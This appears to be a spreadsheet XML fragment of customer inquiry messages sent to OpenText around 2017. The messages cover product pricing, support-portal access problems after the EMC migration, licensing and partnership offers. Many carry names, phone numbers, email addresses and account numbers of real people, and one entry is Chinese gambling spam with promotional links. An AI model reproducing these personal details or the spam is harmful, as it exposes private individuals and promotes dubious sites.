Comprobo’s solution is available anytime and anywhere (web based solution – no download required) and is both user-journey focused as well as being evidence and compliance driven._x000D_
_x000D_
We have now reached that stage of our growth cycle where the forging of relationships with like-minded but complementary technology partners would be ideal. Especially LMS providers, who we know (from recent news reports) are increasingly forming collaborative arrangements and partnerships with remote proctoring / invigilation solution providers._x000D_
_x000D_
We therefore view Open Text as a potential partner who we would like to work with in order to develop collaborative strategies, approaches and offerings aimed at:_x000D_
_x000D_
•	Challenging the prevailing test centre model by offering a viable alternative _x000D_
•	Adding an additional layer of governance (ID verification) where testing is already done on line_x000D_
•	Opening up brand new markets for our clients_x000D_
•	Widening our client audience reach through further ‘enfranchisement’ of their learning programmes_x000D_
•	Delivering significant cost efficiencies for our clients_x000D_
Thank you for </t>
  </si>
  <si>
    <t>We would like to be able to test "Brava! for Microsoft SharePoint". Please let us know how we can get the trial version? Also please let us know what versions of SharePoint are supported?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
LMA planed to install Napa Loading Computer program from Onboard-Napa Ltd._x000D_
To install this program Onboard-Napa Ltd request Open Text Exceed and Exceed 3D software._x000D_
The question is in price, delivery and some approval document (conformation) that we have been get it._x000D_
_x000D_
Arnis</t>
  </si>
  <si>
    <t>Hi There, I wish to complete the certification Content Server Business Consultant Certification v16, however I require to complete the pre-requisites: _x000D_
•  1-0184 Managing Documents in Content Server (2 days)_x000D_
•  1-0185 Collaborating in Content Server (2 days)_x000D_
•  2-0113 Content Server Workflow Design (3 days)_x000D_
•  2-0114 Content Server Forms Design (1 day)_x000D_
•  2-0120 OpenText Records Management (3 days)_x000D_
_x000D_
Are these all available in E-Learning or is this certification packaged, could you please send me the e-learning links to register or the workshop dates and schedules._x000D_
_x000D_
Many Thanks_x000D_
Daylan_x000D_
+27 715180494</t>
  </si>
  <si>
    <t xml:space="preserve">Please add me to the site of ING Bank the netherlands. I can't acces my ticckets at this moment after migration from EMC to Opentext._x000D_
I have several site id's, from Itvisors and ING._x000D_
13329145 ITVISORS ITVISORS, DE PINCKART 54, NUENEN, NETHERLANDS, 5674 CC, NUENEN_x000D_
2369384  ING BANK N V- DBNL ING BANK N V- DBNL, VELPERWEG 45 LOCATIECODE: VK2WEST, ARNHEM, NETHERLANDS, 6824 BG, ARNHEM_x000D_
8021810 MatchFirst MatchFirst, POSTBUS 237 DE PINCKART 54, NUENEN, NETHERLANDS, 5670 AE, NUENEN_x000D_
9076689 MATCHFIRST BV MATCHFIRST BV, DE PINCKART 54, NUENEN, NETHERLANDS, </t>
  </si>
  <si>
    <t>Hi good afternoon_x000D_
This is M N Sriharsha from BSM Consulting Bangalore with Regards to Recruitment Services &amp; would therefore like to have a tie up with your Company for your HR Services &amp; So if you can Provide us with the relevant Person's Contact number &amp; Mail id we can further Communicate for the next Process.</t>
  </si>
  <si>
    <t xml:space="preserve">Connecting the UBS Scanning Factory to Opentext Documentum_x000D_
_x000D_
Hi all_x000D_
_x000D_
I wrote two mail to jtrainor@opentext.com (account manager Documentum for UBS) but never got any response. _x000D_
_x000D_
UBS has a large scanning factory which scans structured and unstructured data against unexpected client data and personal data. A typical example would be client data from Switzerland included in a Documentum repository which can be accessed from outside Switzerland._x000D_
_x000D_
We recently changed the tool and we are now using DataScout from SWISSCOM. UBS is updating all Documentum projects to the version 7.3. _x000D_
_x000D_
We are looking for help to understand how we could create a link between DataScout and Documentum 7.3 repositories. We would like to be able to scan Documentum repositories (folders, subfolders, files). Are there any APIs or interfaces we could use? Can you point us to_x000D_
-	documentation which would help us to understand how to build an interface?_x000D_
-	a technical contact familiar with Documentum 7.3 which could answer questions not answered by the documentation?_x000D_
_x000D_
Many thanks for your support._x000D_
_x000D_
Regards_x000D_
Werner  Wider_x000D_
Service Manager Scanning Factory_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>req.</t>
  </si>
  <si>
    <t xml:space="preserve">I am from a partner with customers inquiring about Rightfax. </t>
  </si>
  <si>
    <t xml:space="preserve">I am Roshan Joshi from Accenture Strategy. We are working with one of a leading petrochemical &amp; refining client in India for setting up logistics control tower.  As a part of this engagement, we are evaluating various technology options w.r.t. client requirements. I am reaching out to you to see if any of your product/services can be relevant in this respect. Following describes brief client requirement:_x000D_
_x000D_
Brief on Client Requirement:_x000D_
1.	Client: A leading Petrochemical &amp; Refining company in India _x000D_
2.	Control Tower requirement is for inbound logistics – capital project procurement &amp; MRO items for refinery._x000D_
3.	Significant import contribution – material sourced from 28 countries + local suppliers in India_x000D_
4.	Transport modes cover both sea, air transport for import. Local transport mostly through roads and sometimes by rail_x000D_
5.	Number of logistics service providers: Total 75 to 100 vendors (Shippers &amp; Freight Forwarders). It is ~50/50 mix of international &amp; domestic Indian firms. It is also mix of large &amp; reputed players like DHL, Universal cargo etc and small players._x000D_
6.	Mostly client takes material from supplier location and manages entire logistics. In few cases supplier manages till port of origin. This is defined as per INCOTERMS agreed with product supplier._x000D_
7.	Overall requirement is to have platform that i) Fetches details from multiple vendor systems ii) analysis data points and provides iii) Visibility  (at each detailed process stage – e.g. cargo reached origin port, cargo loaded, reached destination port, bill of lading prepared, custom clearance done etc).  We want some analytics, alerts and dashboards as well._x000D_
_x000D_
Request you to please share details of your product/services that are relevant for above requirement. Please also share case studies if any available &amp; confirm if your solution is available in India._x000D_
_x000D_
Regards;_x000D_
Roshan Joshi _x000D_
</t>
  </si>
  <si>
    <t>We are using account : shakun.aggarwal@outsourcing.ca-cib.com from so long to raise tickets(technical) for any kind of issues faced on different libraries or any other reason._x000D_
Could you please check now we are not able to raise tickets?_x000D_
_x000D_
We are getting Access issue while taking Support on click of ‘MySupport’ option:</t>
  </si>
  <si>
    <t>sir _x000D_
sub:i am appiled for intenship through costuco website.i have more interest to work on oracle,plsql developer and c language.sir please consider my request as early as possible</t>
  </si>
  <si>
    <t>Please contact me about speaking and sponsorship opportunities at_x000D_
Financial Services Cyber Security &amp; Fraud Forum_x000D_
14-15 March 2018, Grace Hotel Sydney_x000D_
Minimising cyber security and fraud – policies, procedures and technology_x000D_
_x000D_
For the ever-increasing risk of cyber security breaches and continuing threats against financial services organisations the challenge is to develop robust Cyber Security &amp; Fraud prevention programs to protect client and organisation information and reputation. _x000D_
Cyber security in financial services has been indicated as a critical concern for attendees of our recent Conduct Risk 2017 event (see brochure attached). _x000D_
Please contact me about speaking opportunities at the Financial Services Cyber Security &amp; Fraud Forum, to be held on the 14-15 March 2018 at the Grace Hotel Sydney. _x000D_
_x000D_
Target Audience: Financial Services Cyber Security &amp; Fraud Forum is for senior management of all financial institutions, including chief risk officer (CRO), chief information officer (CIO), heads of cyber security, data protection and privacy officer, chief information security officer (CISO), heads of compliance, heads of legal, and heads of strategy, as well as the advisory community. _x000D_
_x000D_
Conference topics: _x000D_
•	Cyber security exposure - how exposed are you? Risks and vulnerabilities; _x000D_
•	Building cyber security resilience; External Risk, Internal Risks, Global Risk and Trends; _x000D_
•	Prevention/preparedness strategies and cyber security risk mitigation; Early red flag detection of significant risks; Anticipate, protect, detect, respond and recover to Cyber Security_x000D_
•	Protecting your organisation’s reputation; Security awareness and behaviour management_x000D_
•	Risk appetite and cyber securities; Best practices and case studies; Regulatory updates; _x000D_
•	 Third-party risk for cyber security; Vulnerability management; Identity Fraud; Data protection; Reputation Management; kill chain FFKC; Phishing, DDoS and Ransomware Attacks; _x000D_
•	Boards &amp; Trustees and cyber security; C</t>
  </si>
  <si>
    <t>Would you be willing to sell vignette.com? For some reason it is owned by you and routes to this site? Thanks</t>
  </si>
  <si>
    <t>Interested to be partner for Documentum and Captiva</t>
  </si>
  <si>
    <t>We are interested in exploring some ICR application within our company and would like to inquire about the capabilities of OpenText Capture Center. It would be great if you can provide us with some performance assessment statistics, specifically on traditional written Chinese characters. Thank you in advance.</t>
  </si>
  <si>
    <t>We would like to open a new, separate GXS account for a new company that will be started.</t>
  </si>
  <si>
    <t>Wanted to know the price for Blazon software, because there's one user wants to buy this software</t>
  </si>
  <si>
    <t>Requesting refund for purchase made today.  I had problems logging in, then problems resetting the password, so I never downloaded the registered version.  Please refund and send confirmation of said refund.  Thank you.</t>
  </si>
  <si>
    <t>I found this prodcut online called as OpenText Output Extender (see below)_x000D_
http://www.opentext.com/file_source/OpenText/en_US/PDF/opentext-po-opentext-output-extender-content-suite-en.pdf_x000D_
But I couldn't find any documentation in the knowledge center to learn more about this product._x000D_
Is this product still supported, if so where can I find some technical details about this product for our evaluation?_x000D_
_x000D_
Thanks,_x000D_
Muthu</t>
  </si>
  <si>
    <t>Ralph Lauren is looking to digitize it’s employee files and move to having a paperless process. We are currently accessing other vendor's DMS solutions, and we’re interested in learning what Open Text may be able to provide.</t>
  </si>
  <si>
    <t>Licensing for QuickScan Pro Software</t>
  </si>
  <si>
    <t>Please provide me with a list of small business resellers of the Actuate BIRT SW Maintenance. I am a procurement representative with Savannah River Nuclear Solutions and we are trying to purchase this through a small business. Thank you!</t>
  </si>
  <si>
    <t>Hi, this is Diana IS Support from Valeo Transmissions in San Lus Potosi,_x000D_
Mexico._x000D_
We have received invoices attached, but  we don't know how to pay to your_x000D_
company neither how much debt we have. Could you sent us the payment_x000D_
statement?_x000D_
 _x000D_
Thanks in advance._x000D_
Regards._x000D_
Diana GUTIERREZ_x000D_
IS Engineer_x000D_
Valeo - Powertrain Systems Business Group_x000D_
Automatic Transmissions, Torque Converters, Mexico_x000D_
San Luis Potosi</t>
  </si>
  <si>
    <t xml:space="preserve">Windows Server 2008 R2 is reaching its end of life for us. We'd like to upgrade our Vista Plus Output Manager to 2012 R2 or 2016. Please let us know the upgrade path, if there's any required downtime, if the client-side application (if applicable) supports Windows 10, and the cost of this upgrade. </t>
  </si>
  <si>
    <t>Would like pricing on a Rightfax server please.</t>
  </si>
  <si>
    <t>Looking for PII inspection tools to address data breach scenarios.</t>
  </si>
  <si>
    <t>Attempting to add new DM users. When I click my 'eDOCS DM Alias' icon, it prompts me to add the server name. When I do it says "The DM Server specified cannot be contacted."</t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm getting an error trying to connect to our Captaris FaxPress_x000D_
_x000D_
CPI Error No. : -7014_x000D_
CPI Error : Cannot communicate with IP address_x000D_
File : .\Source\LoginDlg.cpp_x000D_
Line No. : 137_x000D_
_x000D_
It works fine from other workstations, just trying to figure out why it stopped working on this one._x000D_
_x000D_
Regards, Diego</t>
  </si>
  <si>
    <t>Good evening, as Opentext works with Cloud Management, I'd like to open up a conversation about implementing Teradici SW into Opentext's offer. This can give Opentext an advantage on the Enterprise market. I'm pleased if Opentext's EMEA and CEE Management Team responds to me during this week. Best regards Lina Clintbratt Regional Sales Director EMEA Cloud at Teradici</t>
  </si>
  <si>
    <t>I recently requested an eFax for Jeffrey Palesano SID #E828924, can you confirm if he has an eFax account number?  If so, can you provide it to me.  thanks.</t>
  </si>
  <si>
    <t>I wanted to discuss a demo of the OpenText Media Management product.</t>
  </si>
  <si>
    <t xml:space="preserve">My company does have a support contract but your website keeps taking me in circles.  I have completed the registration steps and email confirmation but I keep end up on logging in and then going back in a circle to get access to mysupport.  We have support for ECD products under the following numbers...EU0014065_x000D_
EU0038667_x000D_
EU0248540_x000D_
</t>
  </si>
  <si>
    <t>I would llike to download the DFC 7.3 version install binary as well the installation guide.</t>
  </si>
  <si>
    <t>Pricing for BIM reader</t>
  </si>
  <si>
    <t>Do you have any agents in Kenya.</t>
  </si>
  <si>
    <t>Dear Sir/Madam, _x000D_
I trust you are well. _x000D_
I am looking for an efficient  Electronic  Records Management System. I am looking for ward to handling workflows and documents indexing, circulation, records management, archives management etc._x000D_
What systems could you offer to support my need._x000D_
_x000D_
Regards.</t>
  </si>
  <si>
    <t>I need access to OpenText knowledge base as Partner._x000D_
I used to have access to Dell EMC's ECD knowledge base but since the migration I don't have access anymore._x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Need a quote._x000D_
_x000D_
281	MAINT-EXMPI550700M-4		Open Text	Open Text Exceed MNT 200-499U, SA3322M	01 October 2017 - 30 September 2018		Renewal_x000D_
281	MAINT-SPMPI570700M-4		Open Text	Open Text Secureshell MNT 200-499U, SA5302M	01 October 2017 - 30 September 2018		Renewal_x000D_
</t>
  </si>
  <si>
    <t>Hi there,_x000D_
I am trying to download the following patches fro OpenText_x000D_
_x000D_
OTEXBAS_INST_1620_700.SAR_x000D_
OTEXERP_INST_1620_600.SAR_x000D_
OTEXRL_INST_1620_700.SAR_x000D_
_x000D_
but I do not have enough Access, can you tell me what I have to do in order to download them?_x000D_
thanks in advance_x000D_
Mihail</t>
  </si>
  <si>
    <t>Hello! We are using Documentum/Captiva products of former EMC, and preparing to migrate to OpenText support site. Need access to My Support page for the products._x000D_
Thank you!</t>
  </si>
  <si>
    <t>We have purchased our maintenance though SAP when we first implemented OpenText.  I am not sure of our company number or other information requested to get a MySupport account setup.  My co-worker Valerie Kober suggested that I open up a ticket to get me added to MySupport.  Her ticket was 2946330.</t>
  </si>
  <si>
    <t>Hello,_x000D_
One customer (insurance field) have an old Captiva version (6.5) and wants to multiply his workstations but he does not have access to his InputAccel kit._x000D_
As support engineer i tried to re-download the Captiva 6.5 but, of course, is not available at EMC's support site._x000D_
_x000D_
Now I am trying to connect to OpenText support site. My email address seems to be in OpenText database, i receive the email with the reset link, but when I try to reset password, I get an error (password failed to update). _x000D_
_x000D_
Please help._x000D_
_x000D_
Thank you,_x000D_
Gabriel</t>
  </si>
  <si>
    <t>Currently using Spicer Version 7.4, and having difficulty with some of our customer's .pdfs._x000D_
I would like to get pricing to upgrade to the current version. I've downloaded an evaluation copy and have determined that this would work for us. _x000D_
Thank you,_x000D_
Bill Brunelli</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm unable to submit service tickets. I have the following access: You now have access to the Online Support Resources available through My Support._x000D_
_x000D_
When I try to request a Technical Question Ticket, I get the following:_x000D_
_x000D_
No Access_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
Could someone please grant me access to submit all types of service tickets?_x000D_
_x000D_
Thank you,_x000D_
Alex Graening</t>
  </si>
  <si>
    <t>We have a program named BI Query. Our installed version (Admin) is 10.2.2.1028. This seems to be a 32-bits version only functioning on Windows 32-bits versions (Windows 7, 8 or 10?). Do you have newer versions that will function on 64-bits operating systems like Windows 7 in the 64 bits Version or Windows 10 (64-bits)? How do I download this version? Version number? Which version of Oracle Client (64 bits) is used for this BI Query version?</t>
  </si>
  <si>
    <t>looking for someone to set up our new corporate's " Media center"</t>
  </si>
  <si>
    <t>I would like to set up a demo for your Digital Asset Management services.</t>
  </si>
  <si>
    <t>Can you tell me how many users the Brava! Desktop DX-P license covers? Do we need to purchase one license per user or machine?</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir setzen die Software RightFax Enterprise 10.6 ein._x000D_
Als TK System nutzen wir die Mitel MX-ONE 6.3 ein._x000D_
Gibt es in diesem Zusammenspiel bekannte Probleme ?_x000D_
Viele Grüße_x000D_
i.A. Bjoern Gorke </t>
  </si>
  <si>
    <t>Our customer, newly based lawyer office has experience with your products from past and they are interested in your products to support their shaping business. Therefore I would like to get in contact with you to discuss options and pricing of your products which could best fit for their needs.</t>
  </si>
  <si>
    <t>Hej,_x000D_
Som aktiv leverantör till Preem så behöver ni registrera ert företag i Preems leverantörsportal. Detta då avtalet mellan Preem och OpenText måste vara kopplat till en godkänd leverantör i Preems system. Det även via denna portal som kommande upphandlingar hanteras. Jag saknar i dagsläget en kontaktperson hos er att vända mig till i detta ärende och skulle uppskatta att bli kontaktad av någon från OpenText._x000D_
_x000D_
Hälsningar,_x000D_
Johan Lilius</t>
  </si>
  <si>
    <t>Hi, I cannot connect to OpenText with my EMC account, I was working with Documentum and now it was moved to OpenText._x000D_
Can you replicate the account?</t>
  </si>
  <si>
    <t>I'm reaching out as I'm interested in learning more about your bulk mail service.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Good afternoon:_x000D_
I was looking for a domain in a host web and I see in whois that you own eroom.com but that you use it as a redirect. My question is this: would you be willing to transfer it ?, I am working on a corporate identity and good, for valuing it._x000D_
Thank you very much._x000D_
Best regards!_x000D_
</t>
  </si>
  <si>
    <t>Hello, I am currently looking at document management platforms to potentially replace our existing software and I am keen to find out more about OpenText Exstream. Thanks Gary</t>
  </si>
  <si>
    <t>Request for for full access to OpenText My Support, with ability to dowload Documentum product regular (security) patches, same as I had with Dell EMC previously.</t>
  </si>
  <si>
    <t>Our company is looking into an electronic document management system. We wish to invite your representative in Kuala Lumpur to give us a presentation. I called up your office in Menara Maxis, Phone: +60 3 2615 2699, but seems like it is a fax machine. Could you please arrange for a representative to contact me?</t>
  </si>
  <si>
    <t>With interest on your B2B integration service. Will appreciate to gather more related information how it facilitate B2B eCommerce, as well as work out budgetary for the solution.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
May I know the top 10 companies name that using OpenText in Malaysia as for their SAP Data Archiving Solution. The purpose I'm asking this question is to write the proposal to our management. _x000D_
_x000D_
Thanks_x000D_
Hafiz</t>
  </si>
  <si>
    <t>I just receive a sample of cannabinoid isolate. 2 bottle. Would you please tell me how much it cost if I want to used your product in the future. And please do not charge my credit card unless I agree to do so. My order # is 3972079 Ref#: 339125._x000D_
Thank you. Anna Jarosz</t>
  </si>
  <si>
    <t>I am interested in the your products for Content Management as well as EFSS (Tempo).  Additionally I am interested in your integrations with SAP and Dassault systems (3DExperience / Enovia).</t>
  </si>
  <si>
    <t>Just want to confirm if my email been recieve from this platform._x000D_
_x000D_
Eric</t>
  </si>
  <si>
    <t>Hello,_x000D_
Is it possible to share me a sample in PDF version of the "Customizing and Administration Guide: OpenText DocuLink for SAP Solutions" book you have on the link: "http://webapp.opentext.com/piroot/dc/v100500-01/dc-cgd/en/html/jsframe.htm?cusattroallg"_x000D_
_x000D_
Best Regards,_x000D_
Sérgio Silva</t>
  </si>
  <si>
    <t>Fax service, i have sent several email regards to this service i await to hear from you as soon as possible._x000D_
_x000D_
Eric</t>
  </si>
  <si>
    <t>Using Brava Desktop TXL and need a new licence key as computer is being replaced</t>
  </si>
  <si>
    <t>Boa tarde! Atuo na empresa Compline na parte de BI e estou tento problemas em extrair relatórios do sistema EMC - input Accel - Scan Plus, gostaria de saber se de alguma forma seria possível gerar relatórios mensais em TXT ou XLS. Grato</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
We are currently configuring SAP PPM with Open Text._x000D_
I would like to have access to the blueprint "Implementing Extended ECM in SAP Portfolio and Project Management (PPM)" or a similar bluenprint that can explain the requirements and how to configure the system._x000D_
_x000D_
Best Regrads,_x000D_
Ty_x000D_
_x000D_
Sérgio Silva</t>
  </si>
  <si>
    <t>We write to make an inquiries about fax service, i will be glad to hear from you with the necessary information's i:e cost and any other valid information that might be needful</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich habe bei Ihnen am 09.08.2017 ein Update der Texte für migration-center im Solutions Catalog eingereicht (Mail ging an partners@opentext.com)._x000D_
Leider ist seitdem nichts passiert._x000D_
_x000D_
Können Sie mir sagen woran das Update momentan hängt?_x000D_
_x000D_
Freundliche Grüße_x000D_
Marc Oltzscher</t>
  </si>
  <si>
    <t>Hi, I am stuck in a loop between logging in to my support (support.opentext.com), requesting a confirmation email, trying to login to my support, which is denied again and so forth..._x000D_
Can you help me?</t>
  </si>
  <si>
    <t>Hi, I just sent a message about me not being able to view my SR's. After a password reset I'm able to login to the My Support page. So the issue has been resolved for me. Maybe a message to first reset your password would be more clear._x000D_
_x000D_
With kind regards,_x000D_
_x000D_
Erik Veenhuis_x000D_
ING DB NL</t>
  </si>
  <si>
    <t>Page not found_x000D_
_x000D_
The requested page "/vercheck" could not be found.</t>
  </si>
  <si>
    <t>Hi, since the migration from DellEMC to OpenText I cannot view my open Service Requests. The page redirects me to the login page. After I login I click on My Support and get redirected to the login page again. Please advise.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
When i click the link provided in the opentext to reset my password i get a response saying 'An error has occurred'_x000D_
_x000D_
I get the same message when i try to reset my password._x000D_
_x000D_
Please resolve asap._x000D_
_x000D_
Regards,_x000D_
Neil</t>
  </si>
  <si>
    <t>I have been advised by EMC (for Documentum support) that  "as of August 30, 2017, product support operations for all Enterprise Content Division products have migrated to OpenText Support (http://mysupport.opentext.com/)". However I am unable to log onto the OpenText site. My EMC credentials don't work and the functionality of the web page I'm directed to by the password reset link appears not to work for me (whatever I try as a new password is rejected with an "Update Password Failed" message).</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
Upon making contact with your company earlier today I was advised to forward to you my details by email, to register for consideration of our services._x000D_
My name is Paul Sperry and I represent a company called Artius Interiors. _x000D_
_x000D_
Artius provide clients with most of the services they’ll require if needing a refurbishment of an existing office or to move to a new one._x000D_
Though I appreciate that Opentext may choose not to renovate or move when next year’s lease ends, I imagine you will be considering your options very soon. Should a renovation or move eventually be required, we would like to partner with you to provide any specialist services that may result._x000D_
_x000D_
We are primarily a design and build company, but we take a holistic approach coordinating all the services that may be required by our clients, which allows them to have just one point of contact._x000D_
We have an impressive client list and are capable of projects to £1M, with the majority of our projects tending to be between 2-8,000 ft2. That said, many of our clients become so from requests for small ad hoc pieces of work which we find an invaluable way of showing commitment, regardless of the size/scope._x000D_
_x000D_
I do appreciate your time in reading this email and would appreciate the opportunity to discuss your current situation with the person that will be responsible for this important process within Opentext._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, we would like to find out more about providing a digital platform for sharing and archival of institutional documents/records.  Please advise the relevant suite of product available and the potential costings. Thank you.  </t>
  </si>
  <si>
    <t>We need technical support to face an issue encountered by a fax-server owned by one of our customer in Republic of San Marino (Italy). The machine is Windows server 2008 R2 based and the product is Captaris RighFax. It seems that the machine has experienced an issued at O.S. level and now the application is not responding and out-of-order. We aren't able to proceed with restart, maybe a reinstallation/reconfiguration is required: if you send me an email address I can provide you with more details. Many thanks</t>
  </si>
  <si>
    <t>Looking for an job change</t>
  </si>
  <si>
    <t>Dear Support,_x000D_
please grant me access to the support area, as I am the responsible for the LANXESS Documentum installation._x000D_
_x000D_
Regards_x000D_
Stefan linke</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
für einen Kunden suchen wir ein DMS-System. Von Ihnen brauchen wir dringend folgende Informationen:_x000D_
_x000D_
1)	Bitte teilen Sie uns mit, ob OpenText eine Standard-Schnittstelle zum ERP-System Dynamics 365 for Operations (früher Dynamics AX) hat_x000D_
2)	Wenn ja, _x000D_
a.	Kosten für Schnittstellen-Software_x000D_
b.	Kosten für Beratung/Implementierung_x000D_
_x000D_
Danke und liebe Grüße,_x000D_
_x000D_
Ali-Reza Bayat_x000D_
</t>
  </si>
  <si>
    <t>Hello ;i am zohre from iran.we have marketing company and we are exporter.for example exporting  fruits.i would like to  know what are your conditions for  cooperation?and what is your request?thanks for your attention,wait to hear from you</t>
  </si>
  <si>
    <t xml:space="preserve">Product demo of the embedded version of OpenText. </t>
  </si>
  <si>
    <t>Hello, I am after information on OpenText products for business process management and automation. In particular I am interested in products like Contract Center and its ability to be integrated into our system. Cheers, Gary (alternate number 0873895568)</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
Gd' Day! This is the DMS Supervisor here looking after the DMS project for OpenText HK. We've notice there isn't any new document arrive at our scanning centre and would like to know why. Furthermore all of the known email contacts were bounced back so we would like to know who to contact as well. Last known person to contact was _x000D_
_x000D_
Director EMEA &amp; APAC Procurement - Stefan Buhmann_x000D_
_x000D_
Thank you very much! Looking forward to hear from you soon._x000D_
_x000D_
Have a good day~!_x000D_
_x000D_
Yours Truly,_x000D_
Vincent</t>
  </si>
  <si>
    <t>★免水菜金 驻测即宋18-88圆 满百提 ~！！_x000D_
专属客服QQ:355915762 _x000D_
专属链接:www.youle138.com _x000D_
备用链接:www.youle810.com_x000D_
限时寸30宋36，寸20宋28~！！_x000D_
专属链接柱测出分更佳~！！_x000D_
下APP可得8-88鸿包，随时随地掏机即玩~！_x000D_
【八大劳虎击平台、真人、捕鱼、体育】玩法多多~！</t>
  </si>
  <si>
    <t>Hi please reset my account as I have locked it accidentally thanks Belinda</t>
  </si>
  <si>
    <t>I worked with CGI which is a partner of OpenText. I have an account with EMC (CGI partner also) and have an access to Documentum. Today, the Documentum products have been migrated to Opentext and when I tried to login to support.opentext.com, my former account (from emc) was not migrated and I need to create new account in opentext. Please let me know if the Documentum access migration from my EMC account was migrated to the opentext. _x000D_
 Thanks.</t>
  </si>
  <si>
    <t>We are a current customer (340028) and we are looking at moring to NetSuite for our ERP system.  Do you integrate with this system?</t>
  </si>
  <si>
    <t>I would like to know the end of support date for RightFax version 10, and the latest version number of RightFax._x000D_
_x000D_
Thankyou for your time.</t>
  </si>
  <si>
    <t>Good morning, I would like to inquire about support packages for our system.</t>
  </si>
  <si>
    <t>Quote for teleform license</t>
  </si>
  <si>
    <t>Hi, I am Kristine Joy Pupa student from Feu-Tech and this message is regarding in my application for intenship in your company. Please kindly inform me if you are looking for intern students, I am interested having a work experience in your company. _x000D_
_x000D_
Thanks and Best Regards,</t>
  </si>
  <si>
    <t>Hello. I am interesting in more details of your solutions. Exactly - if it can convert GIF or JPEG file into readable Excel or PDF or any other format that we can operate with SQL._x000D_
Best regards</t>
  </si>
  <si>
    <t>Partnership. We are distributors for Latin America of OT-Morpho, NUANCE, Guidance Software, Ultra Forensic, etc, and we want to have a meeting to present us and to see the possibility to distribute your products in Latin America. We will be in Canadá the week of September 11th meeting our partner UltraForensic, and may be is a good opportunity to meet with you too. Thank you so much, in advance. Best Regards.</t>
  </si>
  <si>
    <t>EY being a partner of opentext, may I know more about the partner privileges and Partner specific content access in the partner portal.</t>
  </si>
  <si>
    <t>We're interested in using OpenText to manage engineering documents/drawings &amp; source code now, and potentially some other OpenText features later, and would like a demo.</t>
  </si>
  <si>
    <t>At México are piracy sqlbase in ingenio San Pedro and Huixtla Chiapas</t>
  </si>
  <si>
    <t>We would like to evaluate TeleForm and any SDK associated with it.</t>
  </si>
  <si>
    <t>RightFax Express Essentials is part of a bid that we are responding to very soon. Also, would like to know how to become authorized to sell RightFax.</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry on license costs for Teleform._x000D_
_x000D_
We have two main usage scenarios:_x000D_
1. In a networked environment at our data centre_x000D_
2. Desktop use in a couple of our satellite facilities_x000D_
</t>
  </si>
  <si>
    <t>Inquiring whether OpenText has a product that integrates with Peoplesoft HCM for reporting._x000D_
Please have the appropriate sales person contact me for a potential opportunity._x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I have an $89.97 charge on my company card ending in XXXX-XXXX-XXXX-8436 with a transaction date of 8/21/17 for which I did not receive a receipt. I pay for this account for another employee here at our office and am unable to get into her account in order to pull the bill/receipt. I believe this should be for fax line #8662244367 for Kimberly Urbanski. _x000D_
_x000D_
Please provide this back-up to me as soon as possible. If I do not receive a response I will be pursuing having this charge disputed. _x000D_
</t>
  </si>
  <si>
    <t>We currently run Right fax. iam the new admin for the service for the city of austin SUID	24299-12115.    we are looking to add a new xerox and my current license information says i have 41 xerox 1 way licenses being used.    how do i purchase another 1 as we are having a new xerox come online? and now much is the cost?  please send email. thank you Chad</t>
  </si>
  <si>
    <t>You sent me an e-mail about my ticket. This is in the transition from EMC/Dell support. The ticket doesn't say what it is. I want to check it. &lt;return here&gt; I logon with my best guess. It works!! I go to My Support. I'm not allowed. I need a confirmation e-mail. I click the link. I get an email. I click the link. It prompts for a login. I logon with my best guess. It works!! I go to My Support. I'm not allowed. I need a confirmation e-mail. I click the link. I get an email. I click the link. It prompts for a login. &lt;goto return here&gt;_x000D_
I'm a Pascal programmer. I don't like GOTOs. PLEASE FIX!!!_x000D_
It has been over a week since I created the ticket. If I have been "wowed" by my treatment, it is not in a good way.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for pricing on for you faxing product for development use. Please only contact me via email. This would be a minimal license with support for 1 year. 1 user with the ability to use one fax line. Server Requirements for this product/purchase will be needed. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello! I just have a quick question. If a clinic uses NextGen as their EHR and wants to purchase RightFax, I understand that RightFax can integrate with NextGen, but how do the faxes come through to them from the hospitals who don't use NextGen? For example, does the hospital still have to manually fax patient information to the clinic? Or do they have to purchase RightFax as well in order for them to stop manually faxing? Thank you so much!  </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I work for FoxGuard Solutions and have been contracted by Pepco holdings to track their critical infrastructure cyber assets in accordance with NERC CIP standards. One of their assets is "OpenText Exceed OnDemand" in which we need to be able to find product patches and update information. We have an account under the email address patching@foxguardsolutions.com however we seem to not have the permissions required to view any new patches or updates associated with that product. Pepco has asked that we contact you to grant our account with the same permissions as their "otani-olu@pepcoholdings.com" email address. Please let me know if this is possible. Thanks, Ryan</t>
  </si>
  <si>
    <t xml:space="preserve">B2B Strategic Partnership Inquiry </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren!_x000D_
_x000D_
Wir haben in unserem Bestand noch viele Bücher mit Barcodes der Firma Nixdorf aus den 1980er-Jahren und wollen diese Bücher nun mit neueren Etiketten versehen. Dazu müssen wir die alten Etiketten einlesen. Ich kann Ihnen gerne Beispiele dieser Barcodes schicken._x000D_
_x000D_
Die letzten Lesegeräte in unserem Besitz, die diese Barcodes lesen können, stammen ebenfalls aus dem letzten Jahrhundert, funktionieren immer schlechter bzw. fallen nach und nach ganz aus._x000D_
_x000D_
